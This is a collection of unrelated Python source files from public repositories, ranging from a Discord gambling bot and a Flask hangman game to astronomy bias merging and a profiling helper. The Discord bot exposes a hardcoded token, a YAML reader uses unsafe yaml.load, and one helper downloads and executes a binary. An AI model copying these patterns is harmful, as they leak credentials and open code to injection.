% (os.path.realpath(os.getcwd()))\n raise Exception(msg)\n\n sub_info = read_submission_info('.')\n\n if parsed.message:\n sub_info.user_label = parsed.message\n if parsed.metadata:\n sub_info.user_payload = json.loads(parsed.metadata)\n if parsed.challenge:\n sub_info.challenge_name = parsed.challenge\n\n username = get_dockerhub_username(shell)\n\n hashname = build(username, sub_info.challenge_name, do_push, no_cache=parsed.no_cache)\n\n data = {'hash': hashname,\n 'user_label': sub_info.user_label,\n 'user_payload': sub_info.user_payload,\n 'protocols': sub_info.protocols}\n\n if not parsed.no_submit:\n submission_id = dtserver_submit(token, sub_info.challenge_name, data)\n url = get_duckietown_server_url() + '/humans/submissions/%s' % submission_id\n url = href(url)\n\n manual = href('http://docs.duckietown.org/DT18/AIDO/out/')\n ID = termcolor.colored(submission_id, 'cyan')\n msg = '''\n\nSuccessfully created submission {ID}.\n\nYou can track the progress at:\n\n {url}\n \nYou can also use the command `follow` to follow its fate:\n\n {P} dts challenges follow --submission {ID}\n \nYou can speed up the evaluation using your own evaluator:\n\n {P} dts challenges evaluator --submission {ID}\n\nFor more information, see the manual at {manual}\n \n'''.format(ID=ID, P=dark('$'), url=url, manual=manual)\n\n if hasattr(shell, 'sprint'):\n shell.sprint(msg)\n else:\n print(msg)\n\n\ndef dark(x):\n return termcolor.colored(x, attrs=['dark'])\n\n\ndef href(x):\n return termcolor.colored(x, 'blue', attrs=['underline'])\n\n\nclass CouldNotReadInfo(Exception):\n pass\n\n\nclass SubmissionInfo(object):\n def __init__(self, challenge_name, user_label, user_payload, protocols):\n self.challenge_name = challenge_name\n self.user_label = user_label\n self.user_payload = user_payload\n self.protocols = protocols\n\n\ndef read_submission_info(dirname):\n bn = 'submission.yaml'\n fn = os.path.join(dirname, bn)\n\n try:\n data = read_yaml_file(fn)\n except Exception as e:\n raise CouldNotReadInfo(format_exception(e))\n try:\n known = ['challenge', 'protocol', 'user-label', 'user-payload', 'description']\n challenge_name = data.pop('challenge')\n protocols = data.pop('protocol')\n if not isinstance(protocols, list):\n protocols = [protocols]\n user_label = data.pop('user-label', None)\n user_payload = data.pop('user-payload', None)\n description = data.pop('description', None)\n if data:\n msg = 'Unknown keys: %s' % list(data)\n msg += '\\n\\nI expect only the keys %s' % known\n raise Exception(msg)\n return SubmissionInfo(challenge_name, user_label, user_payload, protocols)\n except Exception as e:\n msg = 'Could not read file %r: %s' % (fn, e)\n raise CouldNotReadInfo(msg)\n\n\nimport os\n\n# noinspection PyUnresolvedReferences\n\nimport yaml\n\n\ndef read_yaml_file(fn):\n if not os.path.exists(fn):\n msg = 'File does not exist: %s' % fn\n raise Exception(msg)\n\n with open(fn) as f:\n data = f.read()\n\n try:\n return yaml.load(data, Loader=yaml.Loader)\n except Exception as e:\n msg = 'Could not read YAML file %s:\\n\\n%s' % (fn, e)\n raise Exception(msg)\n","repo_name":"aroumie1997/duckietown-shell-commands","sub_path":"challenges/submit/command.py","file_name":"command.py","file_ext":"py","file_size_in_byte":7389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17129217034","text":"#\n# 1. MAKE SURE USERS CANNOT GAMBLE MORE THAN USER HAS - TJEK\n# 2. MAKE A BETTER MESSAGE THAT TELLS HOW MUCH USER HAS TOTAL AFTER GAMBLING - TJEK\n# 3. 
MAKE A ADD FUNCTION\n# 4. MAKE A MAX AMOUNT THEY CAN ADD\n# 5. MAKE THEY HAVE TO ADD MORE THAN 0\n# 6. INVESTIGATE HOW THE BOT CAN MAKE SOUND\n\n# OTAyMjQ2MzY1ODAxODg5ODYy.YXboaA.seK0SNH9OMn22hGVLsCP9jOKH3k\nimport discord\nfrom gamba_service import GambaService\ngs = GambaService()\n\n\n# GAMBLING BIKS\n# 1. COMMAND TO JOIN - SAVE USER IN A LIST\n# 2. COMMAND TO GAMBLE MONEY\n\nclient = discord.Client()\n\n@client.event\nasync def on_ready():\n print('Bot is running')\n\n@client.event\nasync def on_message(message):\n print(message)\n print(message.author.name)\n print(message.content)\n print(message.author.id)\n\n # If the author of the message is our bot then dont do anything aka return\n if message.author == client.user:\n return\n\n if not message.content.startswith('$'):\n return\n\n if message.content == '$join':\n gs.new_user(message.author.id, message.author.name)\n await message.channel.send(message.author.name + ' has joined the gambling')\n\n if message.content == '$status':\n status = gs.get_status(message.author.id)\n await message.channel.send(status)\n\n if message.content.startswith('$gamble'):\n result = gs.gamble(message.author.id, message.content)\n await message.channel.send(result)\n\n if message.content.startswith('$add'):\n add = gs.add(message.author.id, message.content)\n await message.channel.send(add)\n\n\n\n\n\n\nclient.run('OTAyMjQ2MzY1ODAxODg5ODYy.YXboaA.seK0SNH9OMn22hGVLsCP9jOKH3k')","repo_name":"NkErMi/GambaBot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34332181388","text":"from Library.AikeVideo import CAikeVideo\r\nimport Library.TestProgressBar as tpb\r\nimport threading\r\n\r\n\r\ndef StartDownLoad(app):\r\n dwnFilePath = 'download\\\\VideoList.txt'\r\n with open(dwnFilePath, 'r', encoding='utf-8') as file:\r\n fileInfo = file.read()\r\n fileInfo = fileInfo.strip()\r\n UrlList = fileInfo.splitlines()\r\n for i, url in enumerate(UrlList):\r\n print('the %d url is %s' % (i + 1, url))\r\n aik = CAikeVideo(url, app)\r\n aik.DoDownloadLink()\r\n\r\n\r\ndef main():\r\n app = tpb.App()\r\n t = threading.Thread(target=StartDownLoad, args=(app,))\r\n t.start()\r\n app.MainLoop()\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"jy03599066/AikeVideoDownloader","sub_path":"MyVideoDownloader.py","file_name":"MyVideoDownloader.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38264264586","text":"# !/usr/bin/env python\n# -*-coding: utf-8 -*-\n\n\ndef removeDuplicates(nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n i = 0\n for n in nums:\n if i < 2 or n > nums[i - 2]:\n nums[i] = n\n i += 1\n return i\n","repo_name":"hyt0617/leetcode","sub_path":"80-89/lc_80.py","file_name":"lc_80.py","file_ext":"py","file_size_in_byte":256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16097951828","text":"# A program to tell a user whether it is a weekday or a weekend. \n# Author: Ryan Cox\n\n\n# importing the datetime. \nfrom datetime import date\n\n\n# Getting todays date from date.today(). See readme for reference. \n# Also the day of the week returned as an integer by weekday().\n# The current day of the week as an integer saved under weekNum, i.e. Monday = 0, Tuesday = 1. 
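For example, weekday() returns 2 on a Wednesday and 5 on a Saturday.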
\nweekNum = date.today().weekday()\n\n\n# If weekNum is equal to or less than 4 (Monday - Friday), then it is a weekday. \nif weekNum <= 4:\n    print(\"Yes, unfortunately today is a weekday.\")\n\n#Otherwise it is a weekend. \nelse:\n    print(\"It is the weekend, yay!\")\n","repo_name":"RYANCOX00/PANDS_PROBLEM_SHEETS","sub_path":"4.Weekday/weekday.py","file_name":"weekday.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"14819303459","text":"import os\nimport signal\nimport subprocess\nfrom contextlib import contextmanager\n\n\n@contextmanager\ndef magic_trace(output=\"trace.fxt\", magic_trace_cache=\"/tmp/magic-trace\"):\n    pid = os.getpid()\n    if not os.path.exists(magic_trace_cache):\n        print(f\"Downloading magic_trace to: {magic_trace_cache}\")\n        subprocess.run(\n            [\n                \"wget\",\n                \"-O\",\n                magic_trace_cache,\n                \"-q\",\n                \"https://github.com/janestreet/magic-trace/releases/download/v1.0.2/magic-trace\",\n            ]\n        )\n        subprocess.run([\"chmod\", \"+x\", magic_trace_cache])\n    args = [magic_trace_cache, \"attach\", \"-pid\", str(pid), \"-o\", output]\n    p = subprocess.Popen(args, stderr=subprocess.PIPE, encoding=\"utf-8\")\n    while True:\n        x = p.stderr.readline()\n        print(x)\n        if \"Attached\" in x:\n            break\n    try:\n        yield\n    finally:\n        p.send_signal(signal.SIGINT)\n        r = p.wait()\n        print(p.stderr.read())\n        p.stderr.close()\n        if r != 0:\n            raise ValueError(f\"magic_trace exited abnormally: {r}\")\n","repo_name":"pytorch/pytorch","sub_path":"functorch/dim/magic_trace.py","file_name":"magic_trace.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","stars":72779,"dataset":"github-code","pt":"72"}
+{"seq_id":"17596411040","text":"from argparse import ArgumentParser\nimport subprocess\nfrom subprocess import Popen, PIPE\nfrom os import listdir\nfrom os.path import isfile, join\nimport time\nimport psutil\n\nsupported_langs = [\"python\", \"go\"]\n\ndef run_test():\n    if args.lang == supported_langs[0]:\n        return psutil.Popen(\"python \" + args.prog, stdout=PIPE, stdin=f)\n    if args.lang == supported_langs[1]:\n        return psutil.Popen(\"go run \" + args.prog, stdout=PIPE, stdin=f)\n\nif __name__ == '__main__':\n    parser = ArgumentParser()\n    parser.add_argument('-lang', dest=\"lang\", required=True)\n    parser.add_argument('-prog', dest=\"prog\", required=True)\n    parser.add_argument('-test', dest=\"test\", required=True)\n    parser.add_argument('-time', dest=\"time\", type=int, default=-1, required=False)\n    parser.add_argument('-mem', dest=\"mem\", type=int, default=-1, required=False)\n    args = parser.parse_args()\n    print('vars args', vars(args))\n\n    inFiles = [join(args.test, f) for f in listdir(args.test) if isfile(join(args.test, f)) & f.endswith(\".in\")]\n    ansFiles = [join(args.test, f) for f in listdir(args.test) if isfile(join(args.test, f)) & f.endswith(\".ans\")]\n\n    out = []\n    outReal = []\n    outTime = []\n    outMem = []\n\n    for a in ansFiles:\n        f = open(a)\n        outReal.append(f.read())\n\n    for i in inFiles:\n        f = open(i)\n        start = time.time()\n\n        if args.lang not in supported_langs:\n            print(\"Language not supported: \" + args.lang)\n            exit()\n        else:\n            p = run_test()\n        t = p.memory_info()\n        out.append(p.stdout.read().decode())\n        end = time.time()\n\n        outMem.append(t[3])\n        outTime.append(end-start)\n    \n    out = [s.replace(\"\\r\", \"\") for s in out]\n\n    for i in range(len(out)):\n        a = out[i]\n        b = outReal[i]\n        t = outTime[i]\n        m = outMem[i]\n        print(\"Testing input \" + inFiles[i])\n        if 
a == b:\n if args.time >= 0:\n if t > args.time:\n print(\"\\tTest took too long\")\n print(\"\\tTime: \" + str(t))\n continue\n \n if args.mem >= 0:\n if m > args.mem:\n print(\"\\tTest used too much memory\")\n print(\"\\tMemory: \" + str(m))\n continue\n\n print(\"\\tTest succeeded\")\n else:\n print(\"\\tTest failed\")\n print(\"\\tExpected: \" + b)\n print(\"\\tReceived: \" + a)\n\n","repo_name":"fhartvigmark/kattispy","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":2509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37556654797","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\"\"\"\n 2016-06-16, 2016M-1.0 lzj\n Bias and flat merge\n For bok\n\"\"\"\n\n\nimport numpy as np\nfrom astropy.io import fits\nfrom common import *\nfrom .rm_os import rm_os\nfrom .constant import const\n\n\ndef merge_bias(bias_list, out_bias_file, basedir=\"\", overwrite=False):\n \"\"\" Merge bias with median values\n args:\n bias_list: bias file list or list file\n out_bias_file: output filename\n basedir: path added to files in list\n debug: debug level\n overwrite: if target exists, overwrite or not\n returns:\n 1 if ok, 0 or -1 for error\n \"\"\"\n # process global debug level\n global debug\n if \"debug\" not in globals():\n debug = 0\n log = logger(out_bias_file[0:-4]+'log', \"MergeBias\", debug)\n\n (files, n_file) = list_expand(bias_list, basedir=basedir, log=log)\n if not is_list_exists(files, log=log) :\n log.write(\"NOT all files in list exist. Abort!\", -1)\n return -1\n\n if not overwrite_check(overwrite, [out_bias_file], log=log) :\n log.write(\"Abort!\", -1)\n return -1\n\n data_cube = np.empty([n_file, const.n_amp, const.amp_ny, const.amp_nx], dtype=np.float64)\n\n # load data into cube, overscan removed\n for f in range(n_file) :\n log.write(\"#{:>3d}/{:<3d} Loading: {:s}\".format(f + 1, n_file, files[f]))\n hdulist = fits.open(files[f])\n for a in range(const.n_amp) :\n data_cube[f, a] = rm_os(hdulist[a + 1].data, log)\n hdulist.close()\n\n # get median\n log.write(\"Merging....\")\n bias_data = np.float32(np.median(data_cube, axis=0))\n\n # generate fits structure and save to new file\n new_hdulist = fits.HDUList()\n pri_hdu = fits.PrimaryHDU(header=hdulist[0].header)\n #pri_hdu.header.append((\"BIASCNT\", n_file, \"Bias files count used in this merge\"))\n #pri_hdu.header.append((\"BIASDATE\", now_str(), \"Bias process time\"))\n pri_hdu.header.update(BIASCNT=(n_file, \"Bias files count used in this merge\"),\n BIASDATE=(now_str(), \"Bias process time\"))\n new_hdulist.append( pri_hdu )\n for a in range(const.n_amp) :\n img_hdu = fits.ImageHDU(data=bias_data[a], header=hdulist[a + 1].header)\n new_hdulist.append(img_hdu)\n\n log.write('Save bias to `{}`'.format(out_bias_file))\n new_hdulist.writeto(out_bias_file, clobber=overwrite)\n\n log.close()\n","repo_name":"RapidLzj/2016M","sub_path":"bok/merge_bias.py","file_name":"merge_bias.py","file_ext":"py","file_size_in_byte":2393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36788514538","text":"#!/usr/bin/env python\n\n\"\"\"Governance related constants and helper functions used within the Container.\"\"\"\n\n__author__ = 'Stephen P. 
Henrie, Michael Meisinger'\n\nfrom pyon.core import (bootstrap, MSG_HEADER_ACTOR, MSG_HEADER_ROLES, MSG_HEADER_OP, MSG_HEADER_RESOURCE_ID,\n MSG_HEADER_VALID, MSG_HEADER_USER_CONTEXT_ID)\nfrom pyon.core.bootstrap import IonObject\nfrom pyon.core.exception import BadRequest, Inconsistent\nfrom pyon.ion.resource import RT, PRED, OT\nfrom pyon.util.containers import get_safe, get_ion_ts_millis\nfrom pyon.util.log import log\n\n# These constants are ubiquitous, so define in the container\nDEFAULT_ACTOR_ID = 'anonymous'\nANONYMOUS_ACTOR = DEFAULT_ACTOR_ID\n\nMODERATOR_ROLE = 'MODERATOR' # Can act upon resource within the specific Org, managerial permissions in Org\nOPERATOR_ROLE = 'OPERATOR' # Can act upon resource within the specific Org, action permissions in Org\nMEMBER_ROLE = 'MEMBER' # Can access resources within the specific Org\nSUPERUSER_ROLE = 'SUPERUSER' # Can act upon resources across all Orgs with superuser access\n\n# Decorator names for service operations and their parameters\nDECORATOR_OP_VERB = \"OperationVerb\"\nDECORATOR_ALWAYS_VERIFY_POLICY = \"AlwaysVerifyPolicy\"\nDECORATOR_RESOURCE_ID = \"ResourceId\"\nDECORATOR_USER_CONTEXT_ID = \"UserContextId\"\n\n\ndef get_role_message_headers(org_roles):\n \"\"\"\n Iterate the Org(s) that the user belongs to and create a header that lists only the\n role names per Org (governance name) assigned to the user,\n e.g. {'ION': ['MEMBER', 'OPERATOR'], 'Org2': ['MEMBER']}\n \"\"\"\n role_header = dict()\n try:\n for org in org_roles:\n role_header[org] = []\n for role in org_roles[org]:\n role_header[org].append(role.governance_name)\n\n except Exception:\n log.exception(\"Cannot build role message header\")\n\n return role_header\n\n\ndef build_actor_header(actor_id=None, actor_roles=None):\n \"\"\"\n Build the message header used by governance to identify the actor and roles.\n \"\"\"\n return {MSG_HEADER_ACTOR: actor_id or DEFAULT_ACTOR_ID,\n MSG_HEADER_ROLES: actor_roles or {}}\n\n\ndef get_actor_header(actor_id):\n \"\"\"\n Returns the actor related message headers for a specific actor_id.\n Will return anonymous if the actor_id is not found.\n \"\"\"\n actor_header = build_actor_header(DEFAULT_ACTOR_ID, {})\n\n if actor_id:\n try:\n header_roles = find_roles_by_actor(actor_id)\n actor_header = build_actor_header(actor_id, header_roles)\n except Exception:\n log.exception(\"Cannot build actor message header\")\n\n return actor_header\n\n\ndef has_org_role(role_header=None, org_governance_name=None, role_name=None):\n \"\"\"\n Check the ion-actor-roles message header to see if this actor has the specified role in the specified Org.\n Parameter role_name can be a string with the name of a user role or a list of user role names, which will\n recursively call this same method for each role name in the list until one is found or the list is exhausted.\n \"\"\"\n if role_header is None or org_governance_name is None or role_name is None:\n raise BadRequest(\"One of the parameters to this method are not set\")\n\n if isinstance(role_name, list):\n for role in role_name:\n if has_org_role(role_header, org_governance_name, role):\n return True\n else:\n if org_governance_name in role_header:\n if role_name in role_header[org_governance_name]:\n return True\n\n return False\n\n\ndef find_roles_by_actor(actor_id=None):\n \"\"\"\n Returns a dict of all User Roles roles by Org Name associated with the specified actor\n \"\"\"\n if actor_id is None or not len(actor_id):\n raise BadRequest(\"The actor_id parameter is missing\")\n\n role_dict = 
dict()\n\n gov_controller = bootstrap.container_instance.governance_controller\n role_list, _ = gov_controller.rr.find_objects(actor_id, PRED.hasRole, RT.UserRole)\n\n for role in role_list:\n if role.org_governance_name not in role_dict:\n role_dict[role.org_governance_name] = list()\n\n role_dict[role.org_governance_name].append(role.governance_name)\n\n # Membership in ION Org is implied\n if gov_controller.system_root_org_name not in role_dict:\n role_dict[gov_controller.system_root_org_name] = list()\n\n role_dict[gov_controller.system_root_org_name].append(MEMBER_ROLE)\n\n return role_dict\n\n\ndef get_system_actor():\n \"\"\"\n Returns the ION system actor defined in the Resource Registry as ActorIdentity resource.\n Returns None if not found.\n \"\"\"\n try:\n gov_controller = bootstrap.container_instance.governance_controller\n system_actor_name = get_safe(gov_controller.CFG, \"system.system_actor\", \"ionsystem\")\n system_actor, _ = gov_controller.rr.find_resources(RT.ActorIdentity, name=system_actor_name, id_only=False)\n if not system_actor:\n return None\n\n return system_actor[0]\n\n except Exception:\n log.exception(\"Cannot retrieve system actor\")\n return None\n\n\ndef is_system_actor(actor_id):\n \"\"\"\n Is this the specified actor_id the system actor\n \"\"\"\n system_actor = get_system_actor()\n if system_actor is not None and system_actor._id == actor_id:\n return True\n\n return False\n\ndef get_system_actor_header(system_actor=None):\n \"\"\"\n Returns the actor related message headers for a the ION System Actor\n \"\"\"\n try:\n if system_actor is None:\n system_actor = get_system_actor()\n\n if not system_actor or system_actor is None:\n log.warn(\"The ION System Actor was not found; defaulting to anonymous actor\")\n actor_header = get_actor_header(None)\n else:\n actor_header = get_actor_header(system_actor._id)\n\n return actor_header\n\n except Exception:\n log.exception(\"Could not get system actor header\")\n return get_actor_header(None)\n\n\ndef get_valid_principal_commitments(principal_id=None, consumer_id=None):\n \"\"\"\n Returns the list of valid commitments for the specified principal (org or actor.\n If optional consumer_id (actor) is supplied, then filtered by consumer_id\n \"\"\"\n log.debug(\"Finding commitments for principal: %s\", principal_id)\n if principal_id is None:\n return None\n\n try:\n gov_controller = bootstrap.container_instance.governance_controller\n commitments, _ = gov_controller.rr.find_objects(principal_id, PRED.hasCommitment, RT.Commitment, id_only=False)\n if not commitments:\n return None\n\n cur_time = get_ion_ts_millis()\n commitment_list = [com for com in commitments if (consumer_id == None or com.consumer == consumer_id) and \\\n (int(com.expiration) == 0 or (int(com.expiration) > 0 and cur_time < int(com.expiration)))]\n if commitment_list:\n return commitment_list\n\n except Exception:\n log.exception(\"Could not determine actor resource commitments\")\n\n return None\n\n\ndef get_valid_resource_commitments(resource_id=None, actor_id=None):\n \"\"\"\n Returns the list of valid commitments for the specified resource.\n If optional actor_id is supplied, then filtered by actor_id\n \"\"\"\n log.debug(\"Finding commitments for resource_id: %s and actor_id: %s\", resource_id, actor_id)\n if resource_id is None:\n return None\n\n try:\n gov_controller = bootstrap.container_instance.governance_controller\n commitments, _ = gov_controller.rr.find_subjects(RT.Commitment, PRED.hasTarget, resource_id, id_only=False)\n if not 
commitments:\n return None\n\n cur_time = get_ion_ts_millis()\n commitment_list = [com for com in commitments if (actor_id == None or com.consumer == actor_id) and \\\n (int(com.expiration) == 0 or (int(com.expiration) > 0 and cur_time < int(com.expiration)))]\n if commitment_list:\n return commitment_list\n\n except Exception:\n log.exception(\"Could not determine actor resource commitments\")\n\n return None\n\n\ndef has_valid_resource_commitments(actor_id, resource_id):\n \"\"\"\n Returns a ResourceCommitmentStatus object indicating the commitment status between this resource/actor\n Can only have an exclusive commitment if actor already has a shared commitment.\n \"\"\"\n ret_status = IonObject(OT.ResourceCommitmentStatus)\n commitments = get_valid_resource_commitments(resource_id, actor_id)\n if commitments is None:\n # No commitments were found between this resource_id and actor_id - so return default object with\n # fields set to False\n return ret_status\n\n ret_status.shared = True\n\n for com in commitments:\n if com.commitment.exclusive == True:\n # Found an exclusive commitment\n ret_status.exclusive = True\n return ret_status\n\n # Only a shared commitment was found\n return ret_status\n\n\ndef has_valid_shared_resource_commitment(actor_id=None, resource_id=None):\n \"\"\"\n This method returns True if the specified actor_id has acquired shared access for the specified resource id, otherwise False.\n \"\"\"\n if actor_id is None or resource_id is None:\n raise BadRequest('One or all of the method parameters are not set')\n\n commitment_status = has_valid_resource_commitments(actor_id, resource_id)\n\n return commitment_status.shared\n\n\ndef has_valid_exclusive_resource_commitment(actor_id=None, resource_id=None):\n \"\"\"\n This method returns True if the specified actor_id has acquired exclusive access for the specified resource id, otherwise False.\n \"\"\"\n if actor_id is None or resource_id is None:\n raise BadRequest('One or all of the method parameters are not set')\n\n commitment_status = has_valid_resource_commitments(actor_id, resource_id)\n\n # If the resource has not been acquired for sharing, then it can't have been acquired exclusively\n if not commitment_status.shared:\n return False\n\n return commitment_status.exclusive\n\n\ndef is_resource_owner(actor_id=None, resource_id=None):\n \"\"\"\n Returns True if the specified actor_id is an Owner of the specified resource id, otherwise False\n \"\"\"\n if actor_id is None or resource_id is None:\n raise BadRequest('One or all of the method parameters are not set')\n\n gov_controller = bootstrap.container_instance.governance_controller\n owners = gov_controller.rr.find_objects(subject=resource_id, predicate=PRED.hasOwner, object_type=RT.ActorIdentity, id_only=True)\n\n if actor_id not in owners[0]:\n return False\n\n return True\n\n\nclass GovernanceHeaderValues(object):\n \"\"\"\n A helper class for containing governance values from a message header\n \"\"\"\n\n def __init__(self, headers, process=None, resource_id_required=True):\n \"\"\"\n Helpers for retrieving governance related values: op, actor_id, actor_roles, resource_id from the message header\n @param headers:\n @param resource_id_required: True if the message header must have a resource-id field and value.\n \"\"\"\n if not headers or not isinstance(headers, dict):\n raise BadRequest(\"The headers parameter is not a valid message header dictionary\")\n\n self._op = headers.get(MSG_HEADER_OP, \"Unknown-Operation\")\n\n if process is not None and 
hasattr(process, 'name'):\n self._process_name = process.name\n else:\n if 'process' in headers:\n if getattr(headers['process'], 'name'):\n self._process_name = headers['process'].name\n else:\n self._process_name = \"Unknown-Process\"\n else:\n self._process_name = \"Unknown-Process\"\n\n\n # The self.name references below should be provided by the running ION process (service, agent, etc),\n # which will be using this class.\n if MSG_HEADER_ACTOR in headers:\n self._actor_id = headers[MSG_HEADER_ACTOR]\n else:\n raise Inconsistent('%s(%s) has been denied since the ion-actor-id can not be found in the message headers' % (self._process_name, self._op))\n\n if MSG_HEADER_ROLES in headers:\n self._actor_roles = headers[MSG_HEADER_ROLES]\n else:\n raise Inconsistent('%s(%s) has been denied since the ion-actor-roles can not be found in the message headers' % (self._process_name, self._op))\n\n if MSG_HEADER_RESOURCE_ID in headers:\n self._resource_id = headers[MSG_HEADER_RESOURCE_ID]\n else:\n if resource_id_required:\n raise Inconsistent('%s(%s) has been denied since the resource-id can not be found in the message headers' % (self._process_name, self._op))\n self._resource_id = ''\n\n self._user_context_id = headers.get(MSG_HEADER_USER_CONTEXT_ID, None)\n\n @property\n def op(self):\n return self._op\n\n @property\n def actor_id(self):\n return self._actor_id\n\n @property\n def actor_roles(self):\n return self._actor_roles\n\n @property\n def resource_id(self):\n return self._resource_id\n\n @property\n def user_context_id(self):\n return self._user_context_id\n\n @property\n def process_name(self):\n return self._process_name\n","repo_name":"scionrep/scioncc","sub_path":"src/pyon/core/governance/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":13395,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"14432898409","text":"from work.models.model_wrapper import *\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.pipeline import make_pipeline\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.compose import TransformedTargetRegressor\nfrom sklearn.metrics import mean_absolute_error\n\nfrom work.sampling.samplers import RFR_space\n\nclass RFR(ModelWrapper):\n def __init__(self, prefix, dataset_name, label, spliter=None):\n ModelWrapper.__init__(self, prefix, dataset_name, label, spliter=spliter)\n \n def params(self):\n return {\"n_estimators\":100,\n \"criterion\":'mse',\n \"max_depth\":None,\n \"min_samples_split\":2,\n \"min_samples_leaf\":1,\n \"min_weight_fraction_leaf\":0.0,\n \"max_features\":'auto',\n \"max_leaf_nodes\":None,\n \"min_impurity_decrease\":0.0,\n \"min_impurity_split\":None,\n \"bootstrap\":True,\n \"oob_score\":True,\n \"n_jobs\":None,\n \"random_state\":90125,\n \"verbose\":0,\n \"warm_start\":False,\n \"ccp_alpha\":0.0,\n \"max_samples\":0.7,\n \"scaler\":\"\",\n \"transformer\":\"Standard\"}\n\n def make(self, ptemp):\n ptemp_ = copy.deepcopy(ptemp)\n if \"seeds\" in ptemp_:\n del ptemp_[\"seeds\"]\n \n scaler = self.get_scaler(ptemp_)\n transformer = self.get_transformer(ptemp_) \n \n model = RandomForestRegressor(**ptemp_)\n pipe = make_pipeline(scaler, model)\n regr = TransformedTargetRegressor(pipe, transformer=transformer)\n\n return regr\n\n def predict_val(self, regr, X, oob=False):\n if oob:\n return regr.transformer_.inverse_transform(\n regr.regressor_.steps[1][1].oob_prediction_)\n else:\n return regr.predict(X)\n\n def eval_val(self, regr, X, y, 
oob=False):\n        yhat = self.predict_val(regr, X, oob=oob)\n        return mean_absolute_error(y, yhat)\n\n    def get_search_space(self, country=None, version=None, n=None,\n                         fast=False, stop_after=-1):\n        return RFR_space(fast=fast)\n\n    def string(self):\n        return \"RF\"\n","repo_name":"Leonardbcm/EPFDAML","sub_path":"work/models/RFR.py","file_name":"RFR.py","file_ext":"py","file_size_in_byte":2287,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"}
+{"seq_id":"27635095430","text":"from flask import Flask, request, redirect, render_template, session\napp = Flask(__name__)\napp.secret_key = \"It's a secret to everybody\"\n\n@app.route(\"/\")\ndef start_page():\n    return render_template(\"start.html\")\n\n@app.route(\"/submit_answer\", methods=[\"POST\"])\ndef submit_answer():\n    print(request.form[\"answer\"])\n    session[\"answer\"] = request.form[\"answer\"]\n    session[\"incorrect_guesses\"] = \"\"\n    progress = \"\"\n    for i in range(0,len(request.form[\"answer\"])):\n        if request.form[\"answer\"][i] == \" \":\n            progress += \" \"\n        else:\n            progress += \"_\"\n    session[\"progress\"] = progress\n    return redirect(\"/game\")\n\n@app.route(\"/game\")\ndef game_page():\n    answer = session[\"answer\"]\n    return render_template(\"game.html\")\n\n@app.route(\"/submit_guess\", methods=[\"POST\"])\ndef submit_guess():\n    # print(\"your guess is: \" + request.form[\"guess\"])\n    if request.form[\"guess\"] in session[\"answer\"]:\n        old_progress = session[\"progress\"]\n        new_progress = \"\"\n\n        for i in range(0, len(session[\"answer\"])):\n            if session[\"answer\"][i] == request.form[\"guess\"]:\n                new_progress += request.form[\"guess\"]\n            else:\n                new_progress += old_progress[i]\n        session[\"progress\"] = new_progress\n    else:\n        session[\"incorrect_guesses\"] += request.form[\"guess\"]\n    return redirect(\"/game\")\n\nif __name__ == \"__main__\":\n    app.run(debug=True)","repo_name":"mazurasdf/Python_Aug2022","sub_path":"Flask/hangman/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"10627672735","text":"import leercsv\nimport graficadora\n\nlistV = leercsv.list_diccionario('./WORLD.csv')\ncountry = input(\"Enter the country whose population over time you want to see:\")\naños = ['2022 Population','2020 Population','2015 Population','2010 Population','2000 Population','1990 Population','1980 Population','1970 Population']\nfiltradoPais = list(filter(lambda pais: pais[\"Country/Territory\"]==country ,listV))\nprint(filtradoPais)\ndef valores(x):\n    listVacia =[]\n    for i in años:\n        listVacia.append(x[i])\n    return listVacia\npoblacionValor = list(map(valores ,filtradoPais))\n\n\nlabels = list(map(lambda x: x[0:4],años))\nprint(labels)\nvalores = poblacionValor[0]\nprint(valores)\nvaloresN = list(map(lambda i: int(i),valores))\ngraficadora.graficaBarras(country,labels,valoresN)\n\n","repo_name":"AndresFabianRamirez/EJERCICIOS_DE_PYTHON","sub_path":"pkg/principal.py","file_name":"principal.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"10761395234","text":"# Code from \nimport base64, hashlib\n\n# paste your key on line 6\nkey = \"\"\"\nKEydAtaPubl?PrivkeYfILe= username\n\"\"\"\n\ndef lineToFingerprint(line):\n    key = base64.b64decode(line.strip().split()[1].encode('ascii'))\n    fp_plain = hashlib.md5(key).hexdigest()\n
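    # pair up the hex digits and join with ':' to get the aa:bb:cc:... form\n    return ':'.join(a+b for a,b 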
